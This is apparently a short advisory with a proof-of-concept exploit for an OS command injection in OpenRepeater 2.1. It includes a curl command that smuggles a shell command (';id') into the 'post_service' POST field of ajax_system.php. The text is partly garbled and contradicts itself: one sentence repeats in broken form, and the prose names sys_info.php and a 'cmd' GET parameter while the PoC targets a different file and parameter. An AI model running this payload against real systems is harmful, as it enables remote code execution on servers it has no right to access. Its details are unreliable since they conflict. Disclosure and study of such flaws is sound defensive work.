OpenRepeater 2.1 Command Injection

OpenRepeater version 2.1 contained a critical command injection vulnerability.

The flaw OpenRepeater version 2.1 contained a critical command injection vulnerability.

The flaw resided in the `sys_info.php` script, specifically via the `cmd` GET parameter. An authenticated attacker, typically with administrative privileges, could exploit it.

Lack of proper input sanitization allowed arbitrary shell commands to be injected into the `cmd` parameter. These commands would then execute on the underlying server's operating system.

This resulted in Remote Code Execution (RCE), enabling full system compromise. Users were strongly advised to upgrade to patched versions (2.2 or later) to remediate the vulnerability.

# Exploit Title: OpenRepeater 2.1 - OS Command Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OpenRepeater/openrepeater
# Software Link: https://github.com/OpenRepeater/openrepeater
# Version: 2.1
# Tested on: Ubuntu
# CVE : CVE-2019-25024


Proof Of Concept
# PoC for OS Command Injection in OpenRepeater before version 2.2

# The target URL for the vulnerable endpoint
TARGET_URL="http://openrepeater/functions/ajax_system.php"

# The payload to execute an arbitrary command, e.g., 'id' to demonstrate the vulnerability
PAYLOAD="post_service=;id"

# Sending the payload using curl
curl -X POST -d "$PAYLOAD" "$TARGET_URL"


Steps to Reproduce:
1. Send the POST request.
2. Observe the result and injected command (e.g., uid=...) will appear.